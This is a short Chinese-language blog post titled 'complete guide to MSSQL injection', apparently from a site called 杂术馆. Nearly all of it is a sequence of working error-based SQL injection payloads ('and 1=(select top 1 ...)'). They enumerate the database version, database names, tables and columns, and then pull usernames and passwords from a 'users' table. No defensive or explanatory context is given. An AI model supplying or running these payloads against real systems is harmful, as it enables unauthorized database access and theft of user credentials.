欢迎光临
我们一直在努力

mssql注入全解

数据库基本信息获取

and 1=(select @@version) ? ?获取数据库版本信息
and 1=(select db_name()) ? ?获取当前数据库名称

用户数据库名称获取

获取第一个用户数据库名称
and 1=(select top 1 name from master..sysdatabases where dbid>4)

获取下一个用户数据库名称

and 1=(select top 1 name from master..sysdatabases where dbid>4 and name <> ‘acublog’);
以此类推 获取所有数据库

获取表名

sysobjects 中存放了所有表名

获取第一张表

and 1=(select top 1 name from sysobjects where xtype=’U’)

获取第二张表

and 1=(select top 1 name from sysobjects where xtype=’U’ and name <> ‘threads’ )

获取第三张表

and 1=(select top 1 name from sysobjects where xtype=’U’ and name <> ‘threads’ and name <> ‘users’)
依次类推 获取所有表

获取表 users的列名

获取第一列列名
and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name =’users’))

获取第二列列名
and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name =’users’)and name <> ‘uname’)


获取第三列列名
and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name =’users’)and name <> ‘uname’ and name <> ‘upass’)


获取users数据
获取第一个用户名
and 1=(select top 1 uname from users)

获取第一个用户密码
and 1=(select top 1 upass from users)

未经允许不得转载:杂术馆 » mssql注入全解
分享到: 更多 (0)